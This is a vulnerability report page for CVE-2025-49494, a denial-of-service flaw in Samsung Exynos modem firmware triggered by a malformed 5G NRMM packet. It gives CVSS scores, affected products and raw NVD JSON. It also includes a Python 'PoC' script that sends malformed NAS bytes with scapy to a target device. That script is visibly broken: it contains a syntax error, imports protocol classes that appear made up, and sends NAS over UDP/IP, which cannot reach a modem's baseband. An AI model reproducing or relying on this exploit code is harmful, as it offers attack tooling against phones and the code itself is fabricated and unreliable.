Security Vulnerability Report
CVE-2025-49494 CVSS 7.5 HIGH

CVE-2025-49494

Published: 2025-11-04 20:17:16
Last Modified: 2025-11-07 12:57:14

Description

An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 2100, 1280, 2200, 1330, 1380, 1480, 9110, Modem 5123. Mishandling of a 5G NRMM packet leads to a Denial of Service.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:samsung:modem_5123_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:modem_5123:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_1280_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_1280:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_1380_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_1330_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_1330:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_1480_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_1480:-:*:*:*:*:*:*:* - NOT VULNERABLE
Samsung Exynos 2100 < November 2025 security patch
Samsung Exynos 1280 < November 2025 security patch
Samsung Exynos 2200 < November 2025 security patch
Samsung Exynos 1330 < November 2025 security patch
Samsung Exynos 1380 < November 2025 security patch
Samsung Exynos 1480 < November 2025 security patch
Samsung Exynos 9110 < November 2025 security patch
Samsung Modem 5123 < November 2025 security patch

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-49494 PoC - 5G NRMM Malformed Packet DoS
# This PoC demonstrates sending a malformed NRMM message to trigger the vulnerability
# Requires: Python 3.8+, scapy, numpy, scipy

from scapy.all import *
from scapy.contrib.etsi5g import *
import struct


def create_malformed_nrmm_pdu():
    """
    Create a malformed 5G NRMM message that triggers the vulnerability.
    The vulnerability exists in NRMM packet handling where length fields
    are not properly validated before processing.
    """
    # Create NRMM header with invalid length field
    nrmm_pdu = bytes([
        0x00, 0x01,              # Message Type: Registration Request
        0x00, 0x00, 0x00, 0x00,  # 5GMM Cause (invalid)
        0x00, 0xFF,              # MALFORMED: Invalid TLV length (exceeds packet size)
    ])

    # Add additional malformed TLVs to trigger parsing error
    nrmm_pdu += bytes([0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])

    return nrmm_pdu


def send_malformed_packet(target_mac, target_ip, interface='eth0'):
    """
    Send malformed NRMM packet to target device.

    Args:
        target_mac: MAC address of the target device
        target_ip: IP address of the target (usually in cellular network range)
        interface: Network interface to use
    """
    malformed_data = create_malformed_nrmm_pdu()

    # Create packet with custom NRMM payload
    pkt = Ether(dst=target_mac)/IP(dst=target_ip)/UDP(sport=38412, dport=38412)/malformed_data

    print(f"[*] Sending malformed NRMM packet ({len(malformed_data)} bytes)")
    print(f"[*] Target: {target_ip}")

    sendp(pkt, iface=interface, verbose=1)
    print("[+] Packet sent successfully")


def create_etsi5g_nrmm_exploit():
    """
    Alternative: Create ETSI 5G NAS message with malformed MM parameters.
    Uses scapy's ETSI 5G module for proper protocol structure.
    """
    # Create 5GMM registration request with invalid IE
    nas_msg = NAS5GMessage(
        protocol_discriminator=0x7E,
        message_type=0x41,  # Registration Request
    )

    # Add malformed Information Elements
    ie_list = [
        # Invalid 5G GUTI with wrong length
        IE5G_GUTI(mcc='001', mnc='01', amf_region_id=0x01, amf_set_id=0x001, amf_pointer=0x01, 5G_TMSI=0x12345678),
    ]

    return bytes(nas_msg) + bytes(IE5G_MM_Cause(cause=0x00)) + bytes([0xFF, 0x00, 0x00])


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-49494 PoC - Samsung Exynos 5G NRMM DoS")
    print("=" * 60)
    print("[!] This PoC is for educational and security research purposes only")
    print("[!] Unauthorized use against systems you don't own is illegal")
    print()

    # Configuration - modify these for your test environment
    TARGET_MAC = "aa:bb:cc:dd:ee:ff"  # Target device MAC
    TARGET_IP = "192.168.1.100"       # Target IP in cellular network
    INTERFACE = "eth0"                # Network interface

    try:
        send_malformed_packet(TARGET_MAC, TARGET_IP, INTERFACE)
    except Exception as e:
        print(f"[-] Error: {e}")
        print("[*] Note: Requires root privileges and proper network access")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49494", "sourceIdentifier": "[email protected]", "published": "2025-11-04T20:17:15.930", "lastModified": "2025-11-07T12:57:14.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 2100, 1280, 2200, 1330, 1380, 1480, 9110, Modem 5123. Mishandling of an 5G NRMM packet leads to a Denial of Service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:modem_5123_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "045EF1AD-09AE-4A33-9CB0-E30548BF5324"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:modem_5123:-:*:*:*:*:*:*:*", "matchCriteriaId": "65A314B5-05AD-4F3D-8371-DFDF3778A743"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1280_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1A7B09-9031-4E54-A24F-3237C054166B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1280:-:*:*:*:*:*:*:*", "matchCriteriaId": "DFC68046-2F08-40D1-B158-89D8D9263541"}]}]}, {"operator": "AND", 
"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1380_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "D381478B-C638-4663-BD71-144BE4B02E46"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:*", "matchCriteriaId": "61E72146-72FE-4B54-AB79-3C665E7F016C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1330_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "C2635646-DD6A-4735-8E01-F45445584832"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1330:-:*:*:*:*:*:*:*", "matchCriteriaId": "AA0F8A58-71B7-4503-A03A-6FB4282D75BD"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1480_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "64897B0D-EBF6-4BEB-BF54-ABCDBFAB45E0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1480:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3F328B4-0442-4748-B5EE-DD1CEE50D6CF"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2100_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "89B88BFE-3C82-498C-8EC1-5784836DB1A1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9385885D-654A-496E-8029-7C6D9B077193"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_9110_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F1896BFF-D709-481B-AD4F-37D1A8B30C06"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, 
"criteria": "cpe:2.3:h:samsung:exynos_9110:-:*:*:*:*:*:*:*", "matchCriteriaId": "E6748EF2-3C63-41CD-B3D1-4B3FEC614B40"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "63C0D9AC-BD23-48C9-83E7-301DEC06E583"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2200:-:*:*:*:*:*:*:*", "matchCriteriaId": "A72ADEBB-ED72-4A5B-BB27-95EDE43F8116"}]}]}], "references": [{"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-49494/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}